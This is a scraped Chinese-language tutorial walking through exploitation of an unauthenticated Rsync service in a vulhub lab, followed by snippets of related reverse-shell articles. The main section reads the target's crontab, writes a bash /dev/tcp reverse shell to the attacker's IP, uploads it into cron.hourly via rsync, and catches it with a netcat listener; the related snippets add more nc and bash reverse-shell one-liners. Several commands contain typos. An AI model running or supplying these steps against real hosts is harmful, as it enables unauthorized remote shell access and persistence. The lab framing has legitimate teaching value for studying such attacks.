2. 程式人生 > >Rsync反彈shell

Rsync反彈shell

阿新 發佈:2018-12-22 
進入:vulhub-master/rsunc/common 
開啟:sudo docker-compose up

2、埠掃描

3、使用rsync協議連線目標主機

rsync rsync://10.10.10.131/src/

4、檢視crontab配置檔案

reync rsunc://10.10.10.131/src/etc/crontab

5、下載crontab配置檔案,檢視配置,每小時的17分執行命令/etc/crontab,每個人都不一樣,自行檢視,我是17

 reync rsunc://10.10.10.131/src/etc/crontab ~/crontab.txt

6、建立shell檔案,ip一定要是攻擊的哦,4444是為了與其他埠衝突,可以隨意

#!/bin/bash
/bin/bash -i >& /dev/tcp/10.10.10.128/4444 0>&1

7、授權

chmod 777 shell

8、上傳,根據自己虛擬的ip

rsync -av shell  rsync://10.10.10.131/src/ect/cron.hourly

9、監聽,靜靜等待17分的到來

nc -nvv -lp 4444

相關推薦

Rsync反彈shell

進入:vulhub-master/rsunc/common 開啟:sudo docker-compose up 2、埠掃描 3、使用rsync協議連線目標主機 rsync rsync://10.10.10.131/src/ 4、檢視crontab配置檔案

mshta 反彈shell

def msh send serve http csharp sudo end currently   kali系統準備:   復制以下ruby代碼到/usr/share/metasploit-framework/modules/exploits/windows/smb/

反彈shell監控

-c oct tar conf ptr -i numeric hive aud 轉自:http://pirogue.org/2017/07/25/reverse-shell/ 一、跟蹤系統調用 1. strace bash test.sh root@K

Ncat 反彈 Shell

window cat color style blog win log 反彈 pos ncat -l -n -v -p 9999 ncat -e /bin/sh 127.0.0.1 9999 ncat -e C:\Windows\system32\cmd.exe

Metasploit 生成木馬反彈shell

KaliLinux msfvenom metasploit Metasploit是一款開源的安全漏洞檢測工具,可以幫助安全和IT專業人士識別安全性問題,驗證漏洞的緩解措施,並管理專家驅動的安全性進行評估,提供真正的安全風險情報特點:這種可以擴展的模型將負載控制,編碼器,無操作生成器和漏洞整合在一起

Redis未授權訪問反彈shell

shell conf 授權 shel TP edi 10.10 info image Redis未授權訪問反彈shell 目標主機:10.104.11.178 攻擊機:kali 攻擊步驟: 1.與目標主機連接 root@kali:~# /usr/redis/redis-c

Zabbix sql註入漏洞腳本執行反彈shell

腳本執行 ucc shell UC 編寫 密碼 我們 zabbix 執行 exp檢測是否存在SQL註入漏洞root@ubuntu:~# python zabbix.py http://ip:9090/+------------------------------------

Windows正向綁定shell和反向反彈shell的Python代碼

反彈 RoCE 無法 效果 bre optparser eas rev all Windows下的shell原理 經過查閱資料,使用os.dup2(nfd, ofd)的方式重定向socket的輸入輸出到windows系統的cmd是無法做到的,屬於系統原因,不能直接復制Li

kali linux中meterpreter使用前的反彈shell及其基礎語法

一.反彈shell的型別: 1.reverse_tcp  (基於TCP反向連結反彈shell) 1).在kali linux終端中,生成一個反彈shell linux版: msfvenom -p linux/x86/meterpreter/reverse_tcp lhost

反彈Shell攻擊

2018年11月18日 15:37:55 Morpho.K 閱讀數:6 個人分類: 資訊保安

【shellcode】macOS 利用nc反彈shell的shellcode

shellcode功能:獲取execve系統的呼叫,執行execve("/bin//sh\x00","-c",CMD),其中CMD是我們需要執行的命令,shellcode中我把CMD push到棧上。由於一開始彙編時遇到註釋相關的問題,我就把註釋刪了,lldb或gdb除錯再結合參考文章看一下就比

NC——反彈shell

瑞士軍刀netcat,這隻喵的名氣不言而喻,不管是滲透還是取證,100KB的小身板卻蘊含著巨大的能量,今天我們來簡單研究下如何使用nc反彈shell。 先來個正向shell做下對比: nc -lvvp 1988 -e /bin/bash nc Rhost 1988

徹底理解bash反彈shell

bash反彈:首先公網主機監聽指定埠,然後肉雞執行bash命令向公網指定埠傳送連線請求 公網主機: nc -lvvp 9090 肉雞執行: bash -i &> /dev/tcp/144.34.164.217/9090 0>&1 其中144.34.

破殼漏洞nc反彈shell

10.0.3.99 8080 為本地主機10.0.3.194 為受害機/bin/ 要加上完整路徑x: () { :;};  對空格敏感curl -H 'x: () { :;}; echo; /bin/nc -e /bin/sh 10.0.3.99 8080' http://1

shell指令碼實現批量自動redis反彈shell攻擊

一、shell實現redis反彈shell [[email protected] attack]# cat shell_rebound.sh #!/bin/bash ##create b

反彈shell集錦

popen 建立 它的 socket pan \n edi -c file 1. 關於反彈shell 就是控制端監聽在某TCP/UDP端口,被控端發起請求到該端口,並將其命令行的輸入輸出轉到控制端。reverse shell與telnet,ssh等標準shell對應,

路由器漏洞挖掘之棧溢出 - 反彈shell的payload構造

sock http all ram cda shu n) dwr get 前言 前一篇講到了 ROP 鏈的構造,最後直接使用調用 execve 函數的 shellcode 就可以直接 getshell,但是實際路由器溢出的情況下都不會那麽簡單。 這裏再看一道 DVRF 的題

redis未授權反彈shell

命令 image redis未授權 info bubuko 主機 反彈shell red shell rt發現一處redis未授權,進行反彈shell。輸入反彈命令:主機監聽端口:反彈成功。redis未授權反彈shell

反彈SHELL介紹及原理

如果我們需要到伺服器上執行 Shell 命令,但是因為防火牆等原因,無法由客戶端主動發起連線的情況,就可以使用反彈 Shell 來滿足登陸和操作的需求。 ## 什麼是反彈Shell 正常情況下,我們登陸伺服器獲取 Shell 會話是下面的步驟,使用者在終端軟體(Terminal)中輸入 `ssh root

Linux下shell反彈

shell反彈服務器192.168.22.134開啟端口監聽,監聽端口1234nc -lvnp 1234++++++++++++++++++++++分割線+++++++++++++++++++++++++++客戶機192.168.22.136開啟反彈bash -i >& /dev/tcp/192